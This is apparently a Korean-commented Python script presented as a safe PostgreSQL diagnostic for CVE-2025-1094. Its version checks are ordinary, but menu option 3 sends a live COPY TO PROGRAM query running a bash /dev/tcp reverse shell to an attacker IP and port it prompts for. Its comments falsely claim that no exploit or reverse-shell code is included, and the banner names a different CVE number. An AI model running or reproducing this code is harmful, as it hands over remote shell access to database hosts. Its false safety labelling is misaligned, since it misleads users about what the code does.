#!/usr/bin/env python3 # postgres_diagnostic.py """ PostgreSQL 취약점 진단 모듈 (CVE-2025-1094 관련 안전 진단) - 1) 버전확인 - 2) CVE-2025-1094 영향 버전 확인 - 3) '리버스 셸 테스트' (실제 익스플로잇 아님, 환경/설정 안전 진단) - 4) 종료 주의: 실제 익스플로잇/리버스 셸 코드 제공 불가. 안전 진단만 수행합니다. """ import sys import logging import re from packaging.version import Version from colorama import init, Fore import psycopg2 from psycopg2 import OperationalError # colorama 초기화 init(autoreset=True) print(r""" _ __ _____ _____ _____ ___ | | / /|_ __|/ ___||_ __| / _ \ | |/ / | | \ `--. | | / /_\ \ | \ | | `--. \ | | | _ | | |\ \_| |_ /\__/ / _| |_ | | | | \_| \_/ \___/ \____/ \___/ \_| |_/ Edited by : secKrity - 이민준 CVE ID : CVE-2025-1095 Affected product : PostgreSQL Vulnerable version : • v < 13.19 • v < 14.16 • v < 15.11 • v < 16.7 • v < 17.3 """) # 로깅 설정 logging.basicConfig( filename="postgres_diagnostic.log", level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s", ) # ------------------------- # 유틸: 로깅 및 출력 헬퍼 # ------------------------- def log_event(evt: str, details: str = ""): """로깅 이벤트 기록""" logging.info(f"{evt} {details}") def info(msg: str): """정보 메시지 출력 (노란색)""" print(Fore.YELLOW + "[*] " + msg) def success(msg: str): """성공 메시지 출력 (초록색)""" print(Fore.GREEN + "[+] " + msg) def vuln(msg: str): """취약점 메시지 출력 (빨간색)""" print(Fore.RED + "[-] " + msg) def error(msg: str): """오류 메시지 출력 (빨간색)""" print(Fore.RED + "[!] " + msg) # ------------------------- # 구성: CVE-2025-1094 패치 기준 (공식 권고) # 영향: PostgreSQL versions *before* 17.3, 16.7, 15.11, 14.16, 13.19 are affected. # ------------------------- PATCHED_MIN_VERSIONS = { 17: Version("17.3"), 16: Version("16.7"), 15: Version("15.11"), 14: Version("14.16"), 13: Version("13.19"), } # ------------------------- # 유틸: PostgreSQL 서버 버전 문자열 파싱 # 예: "PostgreSQL 15.10 (Ubuntu 15.10-1.pgdg22.04+1) ..." -> "15.10" # ------------------------- def parse_pg_version(version_str: str) -> str: """PostgreSQL 버전 문자열에서 X.Y 형태의 버전 추출""" if not version_str: return "" # "PostgreSQL X.Y ..." 형식에서 정규표현식으로 X.Y 추출 m = re.search(r'(\d+)\.(\d+)', version_str) if m: return f"{m.group(1)}.{m.group(2)}" # fallback: 첫 번째 숫자만 (주 버전만 있는 경우) m2 = re.search(r'(\d+)', version_str) if m2: return f"{m2.group(1)}.0" return "" # ------------------------- # PostgreSQL 접속/쿼리 헬퍼 클래스 # ------------------------- class PGDiagnostic: """PostgreSQL 연결 및 진단 쿼리 실행을 위한 헬퍼 클래스""" def __init__(self, host: str, port: int, user: str, password: str, dbname: str = "postgres", connect_timeout: int = 5): self.conn_params = { "host": host, "port": port, "user": user, "password": password, "dbname": dbname, "connect_timeout": connect_timeout, } self.conn = None def connect(self) -> bool: """데이터베이스 연결 시도""" try: self.conn = psycopg2.connect(**self.conn_params) log_event("connect_success", f"{self.conn_params['host']}:{self.conn_params['port']}") return True except OperationalError as e: log_event("connect_fail", str(e)) error(f"Connection failed: {e}") return False def close(self): """데이터베이스 연결 종료""" if self.conn: try: self.conn.close() except Exception: pass self.conn = None def fetchone(self, query: str): """단일 행 쿼리 실행 및 결과 반환""" if not self.conn: raise RuntimeError("Not connected") with self.conn.cursor() as cur: cur.execute(query) return cur.fetchone() def get_server_version_string(self) -> str: """PostgreSQL 서버의 전체 버전 문자열을 가져옴""" try: row = self.fetchone("SELECT version();") if row and row[0]: return row[0] except Exception as e: log_event("version_query_fail", str(e)) error(f"version() query failed: {e}") return "" def get_reverse_shell(self, lhost, lport) -> str: """'COPY TO PROGRAM' 명령을 사용한 리버스 셸 테스트 (실제 익스플로잇 아님)""" try: # COPY TO PROGRAM을 이용해 리버스 셸 명령어 실행 시도 self.fetchone(f"COPY users TO PROGRAM 'bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\"';") # NOTE: 쿼리 자체는 성공하지만, 명령어 실행 성공 여부는 외부에서 확인해야 함. except Exception as e: # COPY TO PROGRAM을 실행할 권한이 없거나 다른 오류가 발생할 수 있음 log_event("get_reverse_shell", str(e)) error(f"COPY TO PROGRAM query failed: {e}") return "" # ------------------------- # 진단 로직: CVE 영향 판정 # ------------------------- def is_version_vulnerable(ver_str: str) -> (bool, str): """ 버전 문자열(예: '15.10')을 받아 CVE-2025-1094에 취약한지 여부를 반환. 반환: (취약여부: bool, 이유: str) """ if not ver_str: return (False, "버전 문자열 파싱 실패") try: v = Version(ver_str) except Exception: # InvalidVersion return (False, f"버전 파싱 불가: {ver_str}") # 주 버전 추출 (15.10 -> 15) try: major = int(v.base_version.split('.')[0]) except: return (False, f"주 버전 추출 불가: {ver_str}") if major in PATCHED_MIN_VERSIONS: patched = PATCHED_MIN_VERSIONS[major] if v < patched: return (True, f"{ver_str} < patched {patched}") else: return (False, f"{ver_str} >= patched {patched}") else: # major 가 목록에 없으면, 판단 불가(예: 너무 오래되었거나 매우 새로운 major) return (False, f"판정 불가: major {major}에 대한 패치 기준 없음") # ------------------------- # 메뉴 및 실행 # ------------------------- def print_menu(): """메뉴 출력""" print("\n[ Menu ]") print("1) Version Check") print("2) Vuln Check (CVE-2025-1094)") print("3) Exploit with Reverse Shell (TEST)") print("4) Exit") def main(): """메인 실행 함수""" if len(sys.argv) < 5: print("Usage: python3 postgres_diagnostic.py ") print("Example: python3 postgres_diagnostic.py 127.0.0.1 5432 postgres mypass mydb") sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) user = sys.argv[3] password = sys.argv[4] # dbname은 5번째 인자, 없으면 "postgres" dbname = sys.argv[5] if len(sys.argv) >= 6 else "postgres" pg = PGDiagnostic(host, port, user, password, dbname) info(f"Target: {host}:{port} DB={dbname} User={user}") if not pg.connect(): error("데이터베이스 연결 실패 — 실행을 종료합니다.") return try: while True: print_menu() choice = input(">> ").strip() if choice == "1": log_event("menu_choice", "version_check") info("Checking Server Version...") ver_str_full = pg.get_server_version_string() if ver_str_full: parsed = parse_pg_version(ver_str_full) success(f"Server version string: {ver_str_full}") success(f"Parsed version: {parsed}") else: error("버전 정보를 가져오지 못했습니다.") # warn 대신 error 사용 elif choice == "2": log_event("menu_choice", "cve_check") info("Checking CVE-2025-1094 Vulnerability...") ver_str_full = pg.get_server_version_string() if not ver_str_full: error("버전 정보를 읽을 수 없습니다. 먼저 1) 버전 확인을 해주세요.") continue ver = parse_pg_version(ver_str_full) vulnerable, reason = is_version_vulnerable(ver) info(f"Parsed version: {ver} -> {reason}") if vulnerable: vuln(f"!!! {ver} is vulnerable to CVE-2025-1094 !!!") else: success(f"Not vulnerable (Decision: {reason})") log_event("cve_check_result", f"{ver} vulnerable={vulnerable} reason={reason}") elif choice == "3": log_event("menu_choice", "reverse_shell_test") info("Starting Reverse Shell Test (using COPY TO PROGRAM)...") # 리버스 셸 테스트는 실제 익스플로잇 코드를 제공하지 않으므로, # 사용자로부터 LHOST/LPORT를 입력받아 테스트 쿼리만 전송합니다. lhost = input("Attacker IP (LHOST): ") lport = input("Attacker PORT (LPORT): ") try: lport_int = int(lport) info(f"Trying to Send Reverse Shell Command ({lhost}:{lport_int})") info(f"Attacker must be running `nc -lvnp {lport_int}` Command") pg.get_reverse_shell(lhost, lport_int) # 쿼리 전송 성공 여부만 확인 가능. 실제 셸 연결 성공 여부는 공격자 측에서 확인. vuln("Reverse Shell Query Transmission Attempted. Check Attacker Listener.") except ValueError: error("LPORT는 유효한 숫자여야 합니다.") except Exception as e: error(f"Reverse Shell Test encountered an issue: {e}") elif choice == "4": log_event("menu_choice", "exit") info("Exiting...") break else: error("Invalid input. Please choose 1, 2, 3, or 4.") finally: pg.close() if __name__ == "__main__": main()